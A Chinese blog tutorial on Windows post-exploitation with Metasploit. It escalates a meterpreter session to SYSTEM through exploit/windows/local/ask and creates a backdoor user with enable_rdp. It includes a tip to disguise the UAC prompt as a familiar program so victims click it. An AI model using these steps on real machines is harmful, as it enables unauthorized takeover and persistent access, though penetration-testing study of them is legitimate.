后渗透之创建新用户(windows平台)
本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关
第一步:先确定自己的权限是不是系统权限
如果你得到meterpreter之后,不是系统权限,那么就不能创建新的用户,到后面你就会得到一个权限不足的提示。
如下图

那就先查看自己的权限,getuid

我这个可能不是系统的权限,就需要进行提权,输入 getsystem
很不幸,如果执行之后报错

那就需要再换一个方法,输入bg,进入后台管理模式,并且记住这个session 1

然后这里还需要用到 exploit/windows/local/ask

看看它的选项 options
这里的ip是监听机的ip, 我原来的session是1,而且端口是7777
只需要设置 set session 1和 set lport 7777即可

然后run,然后靶机会有个弹窗需要你确认,点击是即可(可能你觉得这个弹窗很低级,一般人谁会去点这个,但是刚才的设置里面是有一个filename选项的,它可以替换成任意的内容,比如QQ,这样的话,你点击的概率会大大提高)

之后返回的meterpreter就是系统权限了

第二步:创建一个新的用户
如果你输入命令 run getgui -u 用户名 -p 密码,不能创建的话,如下图 
就用 run post/windows/manage/enable_rdp USERNAME=用户名 PASSWORD=密码,这个指令更加稳定,下图是执行成功了

去靶机上面查看,Win+R输入netplwiz,发现成功创建!


浙公网安备 33010602011771号